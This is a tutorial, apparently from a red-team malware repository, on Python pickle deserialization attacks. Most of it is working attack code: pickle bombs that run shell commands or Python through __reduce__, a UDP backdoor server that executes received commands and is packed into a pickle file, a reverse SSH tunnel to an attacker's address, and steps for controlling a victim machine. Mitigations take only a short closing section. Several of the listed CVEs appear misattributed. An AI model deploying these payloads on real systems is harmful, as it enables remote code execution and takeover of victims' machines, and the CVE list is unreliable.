We will walk through three steps, with program code, to show how deserialization attacks work:
- [ Step1 ] Crafting Malicious Data: An attacker crafts a malicious payload that, when deserialized, will execute code on the target system. This payload often takes advantage of the inherent trust the deserialization process places in the incoming data.
- [ Step2 ] Injection: The attacker injects the malicious payload into the application, typically through input fields, network requests, or other data sources.
- [ Step3 ] Execution: The application deserializes the malicious data, triggering the execution of the embedded code. This can lead to arbitrary code execution, compromising the system's security.
# Created: 2024/07/06
# Version: v0.1.1
# Copyright: Copyright (c) 2024 LiuYuancheng
# License: MIT License
Introduction
Deserialization is the process of converting data from a serialized format back into its original data structure. A deserialization attack occurs when an application deserializes untrusted or maliciously crafted data, leading to potential security vulnerabilities. These attacks can result in various forms of exploitation, including arbitrary code execution, data corruption, and denial of service. The vulnerability arises because the deserialization process often assumes that the incoming data is well-formed and trustworthy. Several Common Vulnerabilities and Exposures (CVE) entries are related to Python pickle deserialization vulnerabilities:
- CVE-2011-3389: Untrusted data passed to pickle deserialization can execute arbitrary code.
- CVE-2019-5021: The pickle module in Python is vulnerable to arbitrary code execution due to unsafe deserialization.
- CVE-2018-1000802: A deserialization vulnerability in the pickle module can be exploited to execute arbitrary code.
- CVE-2019-9636: Insecure loading of a pickle-based format in the Pandas library can lead to arbitrary code execution.
- CVE-2019-20907: Improper handling of serialized data leading to potential arbitrary code execution.
- CVE-2024-34997: A critical deserialization vulnerability identified in joblib version 1.4.2, specifically in the NumpyArrayWrapper().read_array() component within the joblib.numpy_pickle module.
Introduction of Python Data Serialization
In Python, data serialization often involves converting data into formats like JSON, YAML, or XML for storage and retrieval. These formats are widely used due to their readability and interoperability. However, they can be limited when handling complex data structures, such as nested dictionaries with bytes data or built-in objects. Consider the following example:
# An example data structure that cannot be converted directly to JSON, YAML, or XML format.
from collections import OrderedDict
data = OrderedDict({
    'Timestamp': '2023-04-05 16:00:00',
    'IoTData': {
        'IP': '172.23.155.209',
        'Port': 3001,
        'value': [1.2, 1.3, 1.4],
        'RptPeer': {
            'Hub1': 1.2,
            'Hub2': 1.3
        },
        'CfgSet': set(['CT100', 'COM3', 3])  # sets are not supported by JSON
    }
})
# The pickle module can serialize such a structure without any conversion.
import pickle
# Serialize the data to bytes
serialized_data = pickle.dumps(data)
# Deserialize the bytes back to the original data
deserialized_data = pickle.loads(serialized_data)
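The difference between the two approaches can be checked directly. The following is a minimal sketch, not part of the original programs: the `sample` dictionary and its values are illustrative assumptions, chosen to contain a set and a bytes value.

```python
import json
import pickle

# Illustrative structure (hypothetical values) holding a set and bytes,
# two types the standard json module cannot encode.
sample = {
    'Port': 3001,
    'CfgSet': {'CT100', 'COM3', 3},
    'Raw': b'\x00\x01',
}

try:
    json.dumps(sample)
    json_ok = True
except TypeError:
    # json.dumps raises TypeError for set and bytes values
    json_ok = False

# pickle round-trips the same structure without a conversion step
restored = pickle.loads(pickle.dumps(sample))
print(json_ok, restored == sample)
```

This convenience is exactly what makes pickle attractive, and it comes from the format being able to describe how to rebuild arbitrary objects.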
Introduction of Python Deserialization Vulnerabilities
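Using the Python pickle module to serialize and deserialize data is convenient, but it is insecure when handling untrusted data. The official Python documentation highlights this risk: it warns that the pickle module is not secure, that only trusted data should be unpickled, and that malicious pickle data can execute arbitrary code during unpickling. Consider the following loader program: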
# A normal pickle serialized data file load program (version v0.0.2)
import pickle
import base64
while True:
    choice = input("Input load serialized data file format([1] byte file, [2] txt file):")
    if choice == '1':
        orignalData = None
        with open('data.pkl', 'rb') as fh:
            orignalData = pickle.load(fh)
        print(orignalData)
    elif choice == '2':
        dataStr = None
        with open('data.txt', 'r') as fh:
            dataStr = fh.read()
        orignalData = pickle.loads(base64.b64decode(dataStr))
        print(orignalData)
    else:
        print("Exit....")
        exit()
To build a simple Python pickle bomb, we can override the __reduce__() method so that it returns the os.system function together with a command string. When the data loader reads the data file, it will then execute the command:
import os
import pickle
import base64
# A simple pickle bomb to run a command
class PickleCmd:
    def __reduce__(self):
        cmd = ('uname -a')
        return os.system, (cmd,)
obj = PickleCmd()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)
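Because loading is what triggers the payload, a suspicious file is better inspected than loaded. The sketch below uses the standard pickletools module to list the callables a pickle would import, without unpickling it. The `Demo` class and `list_imports` helper are hypothetical names, the payload refers only to the harmless print function, and the string-tracking heuristic used for STACK_GLOBAL is a simplification that a deliberately obfuscated pickle could evade.

```python
import pickle
import pickletools

class Demo:
    """Stand-in payload: asks the loader to call print() (harmless)."""
    def __reduce__(self):
        return print, ("side effect at load time",)

def list_imports(payload: bytes):
    """Return (module, name) pairs the pickle stream asks the loader to import.

    The stream is only parsed with pickletools.genops, never unpickled.
    """
    found = []
    strings = []  # string arguments seen so far, used for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(payload):
        if opcode.name == "GLOBAL":
            # Older protocols: the argument is "module name" in one string
            module, name = arg.split(" ", 1)
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL":
            # Protocol 4+: module and name are the two strings pushed just before
            if len(strings) >= 2:
                found.append((strings[-2], strings[-1]))
        elif isinstance(arg, str):
            strings.append(arg)
    return found

imports = list_imports(pickle.dumps(Demo()))
print(imports)
```

A data file that is supposed to contain only dictionaries, lists, and numbers has no reason to import anything, so a non-empty result for such a file is a warning sign.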
Build Python Pickle Bomb
In this section, we will build a more complex Python pickle bomb program that allows us to bypass system authorization mechanisms, remotely execute commands on the victim machine, and retrieve the results.
Clarification on Command Execution
Before we proceed, it's important to clarify how commands can be executed within the __reduce__() function. Consider the following modification:
class PickleCmd:
    def __reduce__(self):
        os.system('date')
        os.system('ifconfig')
        with open('testfile.txt', 'w') as fh:
            fh.write("Test file contents")
        cmd = ('uname -a')
        return os.system, (cmd,)
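If we rebuild the pickle bomb and load it again, the additional commands are not executed by the loader. The body of __reduce__() runs only when the object is pickled, on the machine that builds the data file; the pickle stores just the returned callable and its arguments, so only os.system(cmd) is called at load time. A different single shell command can still be passed this way, for example:
cmd = ('ssh -R 0.0.0.0:7070:localhost:22 <redTeam hacker\'s IP address>')
To run Python code at load time rather than one shell command, __reduce__() has to return the exec() function.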
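The split between pickling time and load time can be verified with a harmless sketch. Everything here is illustrative: the `Demo` class and its `body_runs` counter are hypothetical, and the built-in len function stands in for the callable that would run on the loading side.

```python
import pickle

class Demo:
    body_runs = []  # grows each time the __reduce__ body itself executes

    def __reduce__(self):
        # This statement runs while the object is being pickled
        self.body_runs.append("ran")
        # Only this callable and its arguments are stored in the pickle
        return len, ("four",)

payload = pickle.dumps(Demo())
runs_after_dump = len(Demo.body_runs)

result = pickle.loads(payload)
runs_after_load = len(Demo.body_runs)

print(runs_after_dump, runs_after_load, result)  # prints: 1 1 4
```

The counter does not change during loading, while the value returned by pickle.loads is the result of calling the stored callable, which is why extra statements placed in __reduce__() never reach the machine that loads the file.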
Improving the Pickle Bomb Program
Let's improve our pickle bomb program so that the __reduce__() function returns the exec function and a piece of Python code:
import pickle
import base64
codeContent="""
with open('testfile.txt', 'w') as fh:
    fh.write("Test file contents")
"""
# A simple pickle bomb to run Python code
class PickleCode:
    def __reduce__(self):
        return exec, (codeContent,)
obj = PickleCode()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
    pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
    fh.write(dataStr)
After loading the data file, you will see that the Python code to create a file is executed:
Building a More Complex Python Pickle Bomb
In this section, we will build a more complex Python pickle bomb program. This program will include a UDP server that receives command execution requests from the red team attacker, executes the code, and returns the results to the sender. This method ensures that the red team's IP address is not exposed, even if the bomb is discovered.
Here is the UDP server program:
# A normal UDP server hosted on port 3000 that accepts different UDP client connections,
# executes commands, and sends the results back to the corresponding client (version v0.0.
import socket
import subprocess
BUFFER_SZ = 4096
port = 3000
udpServer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udpServer.bind(('0.0.0.0', port))
while True:
data, address = udpServer.recvfrom(BUFFER_SZ)
cmdMsg = data.decode('utf-8')
if cmdMsg == '': continue
if cmdMsg == 'exit': exit()
result = 'Command not found!'
try:
result = subprocess.check_output(cmdMsg, shell=True).decode()
except Exception as err:
result = str(err)
udpServer.sendto(result.encode('utf-8'), address)
Next, we will read this Python program as a string, pass it as a parameter in the pickle bomb object, and create the pickle bomb data file with a simple bomb builder:
# A normal pickle serialized data file create program (version v0.0.2)
import pickle
import base64
# Serilized file:
#fileName = 'flaskWebShellApp.py'
fileName = 'udpCmdServer.py'
dataStr = None
with open(fileName, 'r') as fh:
dataStr = fh.read()
class PickleBomb:
def __reduce__(self):
pass
return exec, (dataStr,)
obj = PickleBomb()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
fh.write(dataStr)
Now, if anyone runs the pickle loader or any program that attempts to load the pickle file, the bomb will be activated:
We can then use a simple UDP client program to connect to the victim's IP address and run commands:
As shown, we can check the folder structure and network information of the victim.
Remark: Since the Python file is passed in as a string, if the script calls a library that is not installed on the victim's machine, it will fail to execute.
Demo Setup and Execution
To download the programs and try the demo, follow the Program Setup and Program Execution sections at this link:
https://github.com/LiuYuancheng/Python_Malwares_Repo/tree/main/src/pickleBomb
Development/Execution Environment
- Python 3.7.4+
- Additional libraries/software needed: N.A.
Program Files List
Program File | Execution Env | Description |
---|---|---|
pickleBombBuilder.py | python 3 | Program to convert an executable Python program into a byte/text format serialized data file (pickle bomb file). |
pickleBombLoader.py | python 3 | Program to demo loading the byte or text format serialized data and triggering the pickle bomb. |
simplepickleCmdRun.py | python 3 | A simple script that creates a command execution pickle bomb. |
simplepickleCodeRun.py | python 3 | A simple script that creates a Python code pickle bomb. |
udpCmdServer.py | python 3 | A normal UDP server hosted on port 3000 that accepts different UDP client connections. |
udpCom.py | python 3 | A UDP communication library that provides the UDP client program. |
data.txt | | Text format pickle bomb file. |
data.pkl | | Bytes format pickle bomb file. |
The sections below show how to create and demo the Python deserialization attack.
Run the pickle bomb builder
Copy the Python program file (for example udpCmdServer.py) into the same folder as pickleBombBuilder.py, then run the builder with the command:
python pickleBombBuilder.py -f udpCmdServer.py
-c : build cmd bomb: python pickleBombBuilder.py -c <Command string>
-f : build code bomb: python pickleBombBuilder.py -f <Python program file name>
-h : help
The bytes format pickle bomb file data.pkl and the text format pickle bomb file data.txt will then be created.
Run the pickle bomb loader
Copy the pickle file you want to deserialize into the same folder, then run the loader:
python pickleBombLoader.py
Connect to the UDP command execution server
Once the UDP command execution server pickle bomb has been activated, run the UDP communication module, select the UDP client function, and input the victim IP address and port 3000. After connecting, type in a command; it will be sent to the pickle bomb, and the execution result will be retrieved and shown on the client.
python udpCom.py
Mitigations of Python Deserialization Attack
To prevent Python deserialization attacks, there are several points we can follow:
- Avoid Deserialization of Untrusted Data: Do not deserialize data from untrusted sources. Use safer serialization formats such as JSON or XML where possible, as they do not support code execution during deserialization.
- Validate Input: Implement strict input validation to ensure that only well-formed and expected data is processed.
- Use Safe Libraries: Prefer libraries and frameworks that are designed with security in mind and that do not support unsafe deserialization.
- Sandboxing: If deserialization of untrusted data is unavoidable, run the deserialization process in a restricted environment (sandbox) to limit the potential impact.
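When pickle cannot be replaced, one way to apply the input validation point above is to restrict which globals the unpickler may import by overriding Unpickler.find_class, a technique described in the Python pickle documentation. The sketch below is a minimal illustration under stated assumptions: the `SAFE_BUILTINS` allow-list, the `restricted_loads` helper, and the `Demo` payload (which refers only to the harmless print function) are hypothetical names. This approach reduces the attack surface but should not be treated as a complete defense.

```python
import builtins
import io
import pickle

# Hypothetical allow-list: the only globals this loader agrees to import
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the pickle stream asks to import a global
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(
            "global '%s.%s' is forbidden" % (module, name))

def restricted_loads(data: bytes):
    """Like pickle.loads(), but refuses globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

class Demo:
    """Stand-in payload: asks the loader to call print() (harmless)."""
    def __reduce__(self):
        return print, ("this would run at load time",)

# Plain data containers still load normally
plain = restricted_loads(pickle.dumps({"ports": [3000, 3001], "tags": {"a", "b"}}))

# A payload that references a callable outside the allow-list is rejected
try:
    restricted_loads(pickle.dumps(Demo()))
    blocked = False
except pickle.UnpicklingError:
    blocked = True

print(plain, blocked)
```

The allow-list should stay as small as the application's data model permits, since every permitted callable is something a crafted file can invoke.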
Conclusion and Reference
Deserialization attacks pose a significant risk, particularly when using insecure libraries like Python's pickle. Understanding the nature of these vulnerabilities and implementing best practices to avoid or mitigate them is crucial for maintaining secure applications.
Reference: